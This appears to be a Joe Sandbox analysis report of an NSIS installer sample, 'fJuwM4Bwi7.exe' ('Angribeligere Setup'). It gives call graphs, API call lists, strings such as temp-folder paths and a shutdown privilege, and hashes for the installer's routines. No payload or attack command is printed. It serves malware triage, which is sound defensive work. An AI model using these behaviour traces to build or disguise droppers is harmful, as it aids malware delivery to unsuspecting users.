404cdc SendMessageA 5332->5321 5333 4048ea 5 API calls 5349 404c77 5333->5349 5350 404af3 5334->5350 5335->5330 5340 404d58 SendMessageA 5335->5340 5341 404dca GlobalFree 5337->5341 5337->5346 5338->5337 5339 404f40 5339->5330 5344 404f52 ShowWindow GetDlgItem ShowWindow 5339->5344 5343 404d6b 5340->5343 5341->5346 5342 404bc7 GetWindowLongA SetWindowLongA 5345 404be0 5342->5345 5351 404d7c SendMessageA 5343->5351 5344->5330 5347 404be6 ShowWindow 5345->5347 5348 404bfe 5345->5348 5346->5339 5358 40496a 4 API calls 5346->5358 5363 404e0c 5346->5363 5367 404021 SendMessageA 5347->5367 5368 404021 SendMessageA 5348->5368 5349->5321 5349->5332 5350->5342 5352 404bc1 5350->5352 5355 404b42 SendMessageA 5350->5355 5356 404b7e SendMessageA 5350->5356 5357 404b8f SendMessageA 5350->5357 5351->5325 5352->5342 5352->5345 5355->5350 5356->5350 5357->5350 5358->5363 5359->5321 5359->5333 5359->5349 5360 404f16 InvalidateRect 5360->5339 5361 404f2c 5360->5361 5369 4048a5 5361->5369 5362 404e3a SendMessageA 5366 404e50 5362->5366 5363->5362 5363->5366 5365 404ec4 SendMessageA SendMessageA 5365->5366 5366->5360 5366->5365 5367->5330 5368->5359 5372 4047e0 5369->5372 5371 4048ba 5371->5339 5373 4047f6 5372->5373 5374 405d58 18 API calls 5373->5374 5375 40485a 5374->5375 5376 405d58 18 API calls 5375->5376 5377 404865 5376->5377 5378 405d58 18 API calls 5377->5378 5379 40487b lstrlenA wsprintfA SetDlgItemTextA 5378->5379 5379->5371 5380 100010e0 5381 1000110e 5380->5381 5382 100011c4 GlobalFree 5381->5382 5383 100012ad 2 API calls 5381->5383 5384 100011c3 5381->5384 5385 10001266 2 API calls 5381->5385 5386 10001155 GlobalAlloc 5381->5386 5387 100011ea GlobalFree 5381->5387 5388 100011b1 GlobalFree 5381->5388 5389 100012d1 lstrcpyA 5381->5389 5383->5381 5384->5382 5385->5388 5386->5381 5387->5381 5388->5381 5389->5381 5390 4016a1 5391 4029fd 18 API calls 5390->5391 5392 4016a7 GetFullPathNameA 5391->5392 5393 4016be 5392->5393 5394 4016df 5392->5394 5393->5394 5397 40603a 2 API calls 5393->5397 5395 402892 5394->5395 5396 4016f3 GetShortPathNameA 5394->5396 5396->5395 5398 4016cf 5397->5398 5398->5394 5400 405d36 lstrcpynA 5398->5400 5400->5394 5401 10002162 5402 100021c0 5401->5402 5404 100021f6 5401->5404 5403 100021d2 GlobalAlloc 5402->5403 5402->5404 5403->5402 5405 401d26 GetDC GetDeviceCaps 5406 4029e0 18 API calls 5405->5406 5407 401d44 MulDiv ReleaseDC 5406->5407 5408 4029e0 18 API calls 5407->5408 5409 401d63 5408->5409 5410 405d58 18 API calls 5409->5410 5411 401d9c CreateFontIndirectA 5410->5411 5412 4024cb 5411->5412 5413 40442a 5414 404456 5413->5414 5415 404467 5413->5415 5474 40552e GetDlgItemTextA 5414->5474 5417 404473 GetDlgItem 5415->5417 5418 4044d2 5415->5418 5421 404487 5417->5421 5419 4045b6 5418->5419 5428 405d58 18 API calls 5418->5428 5472 40475f 5418->5472 5419->5472 5476 40552e GetDlgItemTextA 5419->5476 5420 404461 5422 405fa1 5 API calls 5420->5422 5423 40449b SetWindowTextA 5421->5423 5426 40585f 4 API calls 5421->5426 5422->5415 5427 403fec 19 API calls 5423->5427 5425 404053 8 API calls 5430 404773 5425->5430 5431 404491 5426->5431 5432 4044b7 5427->5432 5433 404546 SHBrowseForFolderA 5428->5433 5429 4045e6 5434 4058b4 18 API calls 5429->5434 5431->5423 5438 4057c6 3 API calls 5431->5438 5435 403fec 19 API calls 5432->5435 5433->5419 5436 40455e CoTaskMemFree 5433->5436 5437 4045ec 5434->5437 5439 4044c5 5435->5439 5440 4057c6 3 API calls 5436->5440 5477 405d36 lstrcpynA 5437->5477 5438->5423 5475 404021 SendMessageA 5439->5475 5442 40456b 5440->5442 5445 4045a2 SetDlgItemTextA 5442->5445 5449 405d58 18 API calls 5442->5449 5444 4044cb 5447 406061 3 API calls 5444->5447 5445->5419 5446 404603 5448 406061 3 API calls 5446->5448 5447->5418 5455 40460b 5448->5455 5451 40458a lstrcmpiA 5449->5451 5450 404645 5478 405d36 lstrcpynA 5450->5478 5451->5445 5452 40459b lstrcatA 5451->5452 5452->5445 5454 40464e 5456 40585f 4 API calls 5454->5456 5455->5450 5460 40580d 2 API calls 5455->5460 5461 40469d 5455->5461 5457 404654 GetDiskFreeSpaceA 5456->5457 5459 404676 MulDiv 5457->5459 5457->5461 5459->5461 5460->5455 5462 40470e 5461->5462 5464 4048a5 21 API calls 5461->5464 5463 404731 5462->5463 5465 40140b 2 API calls 5462->5465 5479 40400e KiUserCallbackDispatcher 5463->5479 5466 4046fb 5464->5466 5465->5463 5468 404710 SetDlgItemTextA 5466->5468 5469 404700 5466->5469 5468->5462 5470 4047e0 21 API calls 5469->5470 5470->5462 5471 40474d 5471->5472 5480 4043bf 5471->5480 5472->5425 5474->5420 5475->5444 5476->5429 5477->5446 5478->5454 5479->5471 5481 4043d2 SendMessageA 5480->5481 5482 4043cd 5480->5482 5481->5472 5482->5481 4167 40172c 4168 4029fd 18 API calls 4167->4168 4169 401733 4168->4169 4173 4059f6 4169->4173 4171 40173a 4172 4059f6 2 API calls 4171->4172 4172->4171 4174 405a01 GetTickCount GetTempFileNameA 4173->4174 4175 405a32 4174->4175 4176 405a2e 4174->4176 4175->4171 4176->4174 4176->4175 4177 401dac 4185 4029e0 4177->4185 4179 401db2 4180 4029e0 18 API calls 4179->4180 4181 401dbb 4180->4181 4182 401dc2 ShowWindow 4181->4182 4183 401dcd EnableWindow 4181->4183 4184 402892 4182->4184 4183->4184 4186 405d58 18 API calls 4185->4186 4187 4029f4 4186->4187 4187->4179 5483 401eac 5484 4029fd 18 API calls 5483->5484 5485 401eb3 5484->5485 5486 40603a 2 API calls 5485->5486 5487 401eb9 5486->5487 5489 401ecb 5487->5489 5490 405c94 wsprintfA 5487->5490 5490->5489 5491 40192d 5492 4029fd 18 API calls 5491->5492 5493 401934 lstrlenA 5492->5493 5494 4024cb 5493->5494 5495 4024af 5496 4029fd 18 API calls 5495->5496 5497 4024b6 5496->5497 5500 4059c7 GetFileAttributesA CreateFileA 5497->5500 5499 4024c2 5500->5499 5508 401cb0 5509 4029e0 18 API calls 5508->5509 5510 401cc0 SetWindowLongA 5509->5510 5511 402892 5510->5511 5512 401a31 5513 4029e0 18 API calls 5512->5513 5514 401a37 5513->5514 5515 4029e0 18 API calls 5514->5515 5516 4019e1 5515->5516 5517 401e32 5518 4029fd 18 API calls 5517->5518 5519 401e38 5518->5519 5520 40501f 25 API calls 5519->5520 5521 401e42 5520->5521 5522 4054e5 2 API calls 5521->5522 5526 401e48 5522->5526 5523 401e9e CloseHandle 5525 402663 5523->5525 5524 401e67 WaitForSingleObject 5524->5526 5527 401e75 GetExitCodeProcess 5524->5527 5526->5523 5526->5524 5526->5525 5528 40609a 2 API calls 5526->5528 5529 401e87 5527->5529 5530 401e90 5527->5530 5528->5524 5532 405c94 wsprintfA 5529->5532 5530->5523 5532->5530 4191 4015b3 4192 4029fd 18 API calls 4191->4192 4193 4015ba 4192->4193 4209 40585f CharNextA CharNextA 4193->4209 4195 40160a 4196 40160f 4195->4196 4199 401638 4195->4199 4198 401423 25 API calls 4196->4198 4197 4057f1 CharNextA 4200 4015d0 CreateDirectoryA 4197->4200 4201 401616 4198->4201 4204 401423 25 API calls 4199->4204 4202 4015c2 4200->4202 4203 4015e5 GetLastError 4200->4203 4215 405d36 lstrcpynA 4201->4215 4202->4195 4202->4197 4203->4202 4206 4015f2 GetFileAttributesA 4203->4206 4208 401630 4204->4208 4206->4202 4207 401621 SetCurrentDirectoryA 4207->4208 4210 40587a 4209->4210 4212 40588a 4209->4212 4210->4212 4213 405885 CharNextA 4210->4213 4211 4058aa 4211->4202 4212->4211 4214 4057f1 CharNextA 4212->4214 4213->4211 4214->4212 4215->4207 5533 404135 5534 40414b 5533->5534 5538 404257 5533->5538 5537 403fec 19 API calls 5534->5537 5535 4042c6 5536 4042d0 GetDlgItem 5535->5536 5539 40439a 5535->5539 5543 4042e6 5536->5543 5544 404358 5536->5544 5540 4041a1 5537->5540 5538->5535 5538->5539 5545 40429b GetDlgItem SendMessageA 5538->5545 5541 404053 8 API calls 5539->5541 5542 403fec 19 API calls 5540->5542 5546 404395 5541->5546 5547 4041ae CheckDlgButton 5542->5547 5543->5544 5548 40430c 6 API calls 5543->5548 5544->5539 5549 40436a 5544->5549 5564 40400e KiUserCallbackDispatcher 5545->5564 5562 40400e KiUserCallbackDispatcher 5547->5562 5548->5544 5552 404370 SendMessageA 5549->5552 5553 404381 5549->5553 5552->5553 5553->5546 5556 404387 SendMessageA 5553->5556 5554 4042c1 5557 4043bf SendMessageA 5554->5557 5555 4041cc GetDlgItem 5563 404021 SendMessageA 5555->5563 5556->5546 5557->5535 5559 4041e2 SendMessageA 5560 404200 GetSysColor 5559->5560 5561 404209 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5559->5561 5560->5561 5561->5546 5562->5555 5563->5559 5564->5554 4221 402036 4222 4029fd 18 API calls 4221->4222 4223 40203d 4222->4223 4224 4029fd 18 API calls 4223->4224 4225 402047 4224->4225 4226 4029fd 18 API calls 4225->4226 4227 402051 4226->4227 4228 4029fd 18 API calls 4227->4228 4229 40205b 4228->4229 4230 4029fd 18 API calls 4229->4230 4231 402064 4230->4231 4232 40207a CoCreateInstance 4231->4232 4233 4029fd 18 API calls 4231->4233 4236 402099 4232->4236 4237 40214d 4232->4237 4233->4232 4234 401423 25 API calls 4235 402181 4234->4235 4236->4237 4238 40212f MultiByteToWideChar 4236->4238 4237->4234 4237->4235 4238->4237 5565 4014b7 5566 4014bd 5565->5566 5567 401389 2 API calls 5566->5567 5568 4014c5 5567->5568 4660 401bb8 4661 4029e0 18 API calls 4660->4661 4662 401bbf 4661->4662 4663 4029e0 18 API calls 4662->4663 4664 401bc9 4663->4664 4665 401bd9 4664->4665 4666 4029fd 18 API calls 4664->4666 4667 4029fd 18 API calls 4665->4667 4671 401be9 4665->4671 4666->4665 4667->4671 4668 401bf4 4672 4029e0 18 API calls 4668->4672 4669 401c38 4670 4029fd 18 API calls 4669->4670 4673 401c3d 4670->4673 4671->4668 4671->4669 4674 401bf9 4672->4674 4675 4029fd 18 API calls 4673->4675 4676 4029e0 18 API calls 4674->4676 4677 401c46 FindWindowExA 4675->4677 4678 401c02 4676->4678 4681 401c64 4677->4681 4679 401c28 SendMessageA 4678->4679 4680 401c0a SendMessageTimeoutA 4678->4680 4679->4681 4680->4681 4775 40243a 4776 402b07 19 API calls 4775->4776 4777 402444 4776->4777 4778 4029e0 18 API calls 4777->4778 4779 40244d 4778->4779 4780 402457 4779->4780 4783 402663 4779->4783 4781 402470 RegEnumValueA 4780->4781 4782 402464 RegEnumKeyA 4780->4782 4781->4783 4784 402489 RegCloseKey 4781->4784 4782->4784 4784->4783 4791 40223b 4792 402243 4791->4792 4793 402249 4791->4793 4794 4029fd 18 API calls 4792->4794 4795 4029fd 18 API calls 4793->4795 4798 402259 4793->4798 4794->4793 4795->4798 4796 4029fd 18 API calls 4799 402267 4796->4799 4797 4029fd 18 API calls 4800 402270 WritePrivateProfileStringA 4797->4800 4798->4796 4798->4799 4799->4797 4875 40173f 4876 4029fd 18 API calls 4875->4876 4877 401746 4876->4877 4878 401764 4877->4878 4879 40176c 4877->4879 4914 405d36 lstrcpynA 4878->4914 4915 405d36 lstrcpynA 4879->4915 4882 40176a 4886 405fa1 5 API calls 4882->4886 4883 401777 4884 4057c6 3 API calls 4883->4884 4885 40177d lstrcatA 4884->4885 4885->4882 4907 401789 4886->4907 4887 40603a 2 API calls 4887->4907 4888 4059a2 2 API calls 4888->4907 4890 4017a0 CompareFileTime 4890->4907 4891 401864 4893 40501f 25 API calls 4891->4893 4892 40183b 4894 40501f 25 API calls 4892->4894 4901 401850 4892->4901 4895 40186e 4893->4895 4894->4901 4896 402f1f 46 API calls 4895->4896 4897 401881 4896->4897 4898 401895 SetFileTime 4897->4898 4900 4018a7 CloseHandle 4897->4900 4898->4900 4899 405d58 18 API calls 4899->4907 4900->4901 4902 4018b8 4900->4902 4904 4018d0 4902->4904 4905 4018bd 4902->4905 4903 405d36 lstrcpynA 4903->4907 4906 405d58 18 API calls 4904->4906 4908 405d58 18 API calls 4905->4908 4910 4018d8 4906->4910 4907->4887 4907->4888 4907->4890 4907->4891 4907->4892 4907->4899 4907->4903 4911 40554a MessageBoxIndirectA 4907->4911 4913 4059c7 GetFileAttributesA CreateFileA 4907->4913 4909 4018c5 lstrcatA 4908->4909 4909->4910 4912 40554a MessageBoxIndirectA 4910->4912 4911->4907 4912->4901 4913->4907 4914->4882 4915->4883 5569 40163f 5570 4029fd 18 API calls 5569->5570 5571 401645 5570->5571 5572 40603a 2 API calls 5571->5572 5573 40164b 5572->5573 5574 40193f 5575 4029e0 18 API calls 5574->5575 5576 401946 5575->5576 5577 4029e0 18 API calls 5576->5577 5578 401950 5577->5578 5579 4029fd 18 API calls 5578->5579 5580 401959 5579->5580 5581 40196c lstrlenA 5580->5581 5582 4019a7 5580->5582 5583 401976 5581->5583 5583->5582 5587 405d36 lstrcpynA 5583->5587 5585 401990 5585->5582 5586 40199d lstrlenA 5585->5586 5586->5582 5587->5585

                                        Executed Functions

                                        Function 00403217 Relevance: 79.1, APIs: 27, Strings: 18, Instructions: 337stringfilecomCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 403217-4032ae #17 SetErrorMode OleInitialize call 406061 SHGetFileInfoA call 405d36 GetCommandLineA call 405d36 GetModuleHandleA 7 4032b0-4032b5 0->7 8 4032ba-4032cf call 4057f1 CharNextA 0->8 7->8 11 403394-403398 8->11 12 4032d4-4032d7 11->12 13 40339e 11->13 14 4032d9-4032dd 12->14 15 4032df-4032e7 12->15 16 4033b1-4033cb GetTempPathA call 4031e3 13->16 14->14 14->15 17 4032e9-4032ea 15->17 18 4032ef-4032f2 15->18 26 403423-40343d DeleteFileA call 402c79 16->26 27 4033cd-4033eb GetWindowsDirectoryA lstrcatA call 4031e3 16->27 17->18 20 403384-403391 call 4057f1 18->20 21 4032f8-4032fc 18->21 20->11 36 403393 20->36 24 403314-403341 21->24 25 4032fe-403304 21->25 32 403343-403349 24->32 33 403354-403382 24->33 30 403306-403308 25->30 31 40330a 25->31 41 4034d1-4034e0 call 403695 OleUninitialize 26->41 42 403443-403449 26->42 27->26 44 4033ed-40341d GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4031e3 27->44 30->24 30->31 31->24 38 40334b-40334d 32->38 39 40334f 32->39 33->20 35 4033a0-4033ac call 405d36 33->35 35->16 36->11 38->33 38->39 39->33 55 4034e6-4034f6 call 40554a ExitProcess 41->55 56 4035da-4035e0 41->56 46 4034c1-4034c8 call 403787 42->46 47 40344b-403456 call 4057f1 42->47 44->26 44->41 53 4034cd 46->53 59 403458-403481 47->59 60 40348c-403496 47->60 53->41 57 4035e6-403603 call 406061 * 3 56->57 58 40367d-403685 56->58 89 403605-403607 57->89 90 40364d-40365b call 406061 57->90 62 403687 58->62 63 40368b-40368f ExitProcess 58->63 65 403483-403485 59->65 66 403498-4034a5 call 4058b4 60->66 67 4034fc-403516 lstrcatA lstrcmpiA 60->67 62->63 65->60 70 403487-40348a 65->70 66->41 77 4034a7-4034bd call 405d36 * 2 66->77 67->41 72 403518-40352d CreateDirectoryA SetCurrentDirectoryA 67->72 70->60 70->65 73 40353a-403562 call 405d36 72->73 74 40352f-403535 call 405d36 72->74 85 403568-403584 call 405d58 DeleteFileA 73->85 74->73 77->46 95 4035c5-4035cc 85->95 96 403586-403596 CopyFileA 85->96 89->90 94 403609-40360b 89->94 101 403669-403674 ExitWindowsEx 90->101 102 40365d-403667 90->102 94->90 98 40360d-40361f GetCurrentProcess 94->98 95->85 99 4035ce-4035d5 call 405bea 95->99 96->95 100 403598-4035b8 call 405bea call 405d58 call 4054e5 96->100 98->90 107 403621-403643 98->107 99->41 100->95 117 4035ba-4035c1 CloseHandle 100->117 101->58 106 403676-403678 call 40140b 101->106 102->101 102->106 106->58 107->90 117->95
                                        APIs
                                        • #17.COMCTL32 ref: 00403238
                                        • SetErrorMode.KERNELBASE(00008001), ref: 00403243
                                        • OleInitialize.OLE32(00000000), ref: 0040324A
                                          • Part of subcall function 00406061: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 00406073
                                          • Part of subcall function 00406061: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 0040607E
                                          • Part of subcall function 00406061: GetProcAddress.KERNEL32(00000000,?), ref: 0040608F
                                        • SHGetFileInfoA.SHELL32(0041ECB8,00000000,?,00000160,00000000,00000009), ref: 00403272
                                          • Part of subcall function 00405D36: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405D43
                                        • GetCommandLineA.KERNEL32(00422F00,NSIS Error), ref: 00403287
                                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\fJuwM4Bwi7.exe",00000000), ref: 0040329A
                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\fJuwM4Bwi7.exe",00000020), ref: 004032C5
                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033C2
                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033D3
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033DF
                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033F3
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033FB
                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040340C
                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403414
                                        • DeleteFileA.KERNELBASE(1033), ref: 00403428
                                        • OleUninitialize.OLE32(?), ref: 004034D6
                                        • ExitProcess.KERNEL32 ref: 004034F6
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\fJuwM4Bwi7.exe",00000000,?), ref: 00403502
                                        • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 0040350E
                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040351A
                                        • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403521
                                        • DeleteFileA.KERNEL32(0041E8B8,0041E8B8,?,00424000,?), ref: 0040357A
                                        • CopyFileA.KERNEL32(C:\Users\user\Desktop\fJuwM4Bwi7.exe,0041E8B8,00000001), ref: 0040358E
                                        • CloseHandle.KERNEL32(00000000,0041E8B8,0041E8B8,?,0041E8B8,00000000), ref: 004035BB
                                        • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000005,00000004), ref: 00403614
                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 0040366C
                                        • ExitProcess.KERNEL32 ref: 0040368F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                        • String ID: "$"C:\Users\user\Desktop\fJuwM4Bwi7.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\terephthalate\edderdun$C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Classifies$C:\Users\user\Desktop$C:\Users\user\Desktop\fJuwM4Bwi7.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$`KGw$~nsu.tmp
                                        • API String ID: 4107622049-3805561568
                                        • Opcode ID: 0e0f6a3637583670758f503623c3da15b8d87b56266dba0afd803753b1801d7b
                                        • Instruction ID: 3d26bb40307c87b2cd60c260c775e6d0301d96a10e68b952128d49a18977981a
                                        • Opcode Fuzzy Hash: 0e0f6a3637583670758f503623c3da15b8d87b56266dba0afd803753b1801d7b
                                        • Instruction Fuzzy Hash: 85B107706082517AE721AF659D8DA2B3EACEB41706F04447FF541BA1E2C77C9E01CB6E
                                        Function 0040515D Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 118 40515d-405179 119 405308-40530e 118->119 120 40517f-405246 GetDlgItem * 3 call 404021 call 4048bd GetClientRect GetSystemMetrics SendMessageA * 2 118->120 122 405310-405332 GetDlgItem CreateThread CloseHandle 119->122 123 405338-405344 119->123 142 405264-405267 120->142 143 405248-405262 SendMessageA * 2 120->143 122->123 125 405366-40536c 123->125 126 405346-40534c 123->126 127 4053c1-4053c4 125->127 128 40536e-405374 125->128 130 405387-40538e call 404053 126->130 131 40534e-405361 ShowWindow * 2 call 404021 126->131 127->130 136 4053c6-4053cc 127->136 132 405376-405382 call 403fc5 128->132 133 40539a-4053aa ShowWindow 128->133 139 405393-405397 130->139 131->125 132->130 140 4053ba-4053bc call 403fc5 133->140 141 4053ac-4053b5 call 40501f 133->141 136->130 144 4053ce-4053e1 SendMessageA 136->144 140->127 141->140 147 405277-40528e call 403fec 142->147 148 405269-405275 SendMessageA 142->148 143->142 149 4053e7-405413 CreatePopupMenu call 405d58 AppendMenuA 144->149 150 4054de-4054e0 144->150 157 405290-4052a4 ShowWindow 147->157 158 4052c4-4052e5 GetDlgItem SendMessageA 147->158 148->147 155 405415-405425 GetWindowRect 149->155 156 405428-40543e TrackPopupMenu 149->156 150->139 155->156 156->150 159 405444-40545e 156->159 160 4052b3 157->160 161 4052a6-4052b1 ShowWindow 157->161 158->150 162 4052eb-405303 SendMessageA * 2 158->162 163 405463-40547e SendMessageA 159->163 164 4052b9-4052bf call 404021 160->164 161->164 162->150 163->163 165 405480-4054a0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 163->165 164->158 167 4054a2-4054c2 SendMessageA 165->167 167->167 168 4054c4-4054d8 GlobalUnlock SetClipboardData CloseClipboard 167->168 168->150
                                        APIs
                                        • GetDlgItem.USER32(?,00000403), ref: 004051BC
                                        • GetDlgItem.USER32(?,000003EE), ref: 004051CB
                                        • GetClientRect.USER32(?,?), ref: 00405208
                                        • GetSystemMetrics.USER32(00000002), ref: 0040520F
                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405230
                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405241
                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405254
                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405262
                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405275
                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405297
                                        • ShowWindow.USER32(?,00000008), ref: 004052AB
                                        • GetDlgItem.USER32(?,000003EC), ref: 004052CC
                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004052DC
                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052F5
                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405301
                                        • GetDlgItem.USER32(?,000003F8), ref: 004051DA
                                          • Part of subcall function 00404021: SendMessageA.USER32(00000028,?,00000001,00403E52), ref: 0040402F
                                        • GetDlgItem.USER32(?,000003EC), ref: 0040531D
                                        • CreateThread.KERNEL32(00000000,00000000,Function_000050F1,00000000), ref: 0040532B
                                        • CloseHandle.KERNELBASE(00000000), ref: 00405332
                                        • ShowWindow.USER32(00000000), ref: 00405355
                                        • ShowWindow.USER32(?,00000008), ref: 0040535C
                                        • ShowWindow.USER32(00000008), ref: 004053A2
                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053D6
                                        • CreatePopupMenu.USER32 ref: 004053E7
                                        • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004053FC
                                        • GetWindowRect.USER32(?,000000FF), ref: 0040541C
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405435
                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405471
                                        • OpenClipboard.USER32(00000000), ref: 00405481
                                        • EmptyClipboard.USER32 ref: 00405487
                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 00405490
                                        • GlobalLock.KERNEL32(00000000), ref: 0040549A
                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054AE
                                        • GlobalUnlock.KERNEL32(00000000), ref: 004054C7
                                        • SetClipboardData.USER32(00000001,00000000), ref: 004054D2
                                        • CloseClipboard.USER32 ref: 004054D8
                                        Strings
                                        • Angribeligere Setup: Installing, xrefs: 0040544D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                        • String ID: Angribeligere Setup: Installing
                                        • API String ID: 590372296-2219571644
                                        • Opcode ID: 3e6425cd8027a1822d7c02b399c2ff8f99ecd6318ec4cf5a11e34b93871bf819
                                        • Instruction ID: 24acf85f457993e5d1a00f4a74fbc0a00d7f38a893508f9c9f1f5035b4e63235
                                        • Opcode Fuzzy Hash: 3e6425cd8027a1822d7c02b399c2ff8f99ecd6318ec4cf5a11e34b93871bf819
                                        • Instruction Fuzzy Hash: 5FA15BB1900208BFDB219FA0DD89AAE7F79FB08355F10407AFA04B61A0C7B55E51DF69
                                        Function 00405D58 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 199stringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 414 405d58-405d63 415 405d65-405d74 414->415 416 405d76-405d8b 414->416 415->416 417 405d91-405d9c 416->417 418 405f7e-405f82 416->418 417->418 419 405da2-405da9 417->419 420 405f88-405f92 418->420 421 405dae-405db8 418->421 419->418 423 405f94-405f98 call 405d36 420->423 424 405f9d-405f9e 420->424 421->420 422 405dbe-405dc5 421->422 426 405f71 422->426 427 405dcb-405e00 422->427 423->424 428 405f73-405f79 426->428 429 405f7b-405f7d 426->429 430 405e06-405e11 GetVersion 427->430 431 405f1b-405f1e 427->431 428->418 429->418 432 405e13-405e17 430->432 433 405e2b 430->433 434 405f20-405f23 431->434 435 405f4e-405f51 431->435 432->433 439 405e19-405e1d 432->439 436 405e32-405e39 433->436 440 405f33-405f3f call 405d36 434->440 441 405f25-405f31 call 405c94 434->441 437 405f53-405f5a call 405d58 435->437 438 405f5f-405f6f lstrlenA 435->438 443 405e3b-405e3d 436->443 444 405e3e-405e40 436->444 437->438 438->418 439->433 447 405e1f-405e23 439->447 451 405f44-405f4a 440->451 441->451 443->444 449 405e42-405e65 call 405c1d 444->449 450 405e79-405e7c 444->450 447->433 452 405e25-405e29 447->452 462 405f02-405f06 449->462 463 405e6b-405e74 call 405d58 449->463 455 405e8c-405e8f 450->455 456 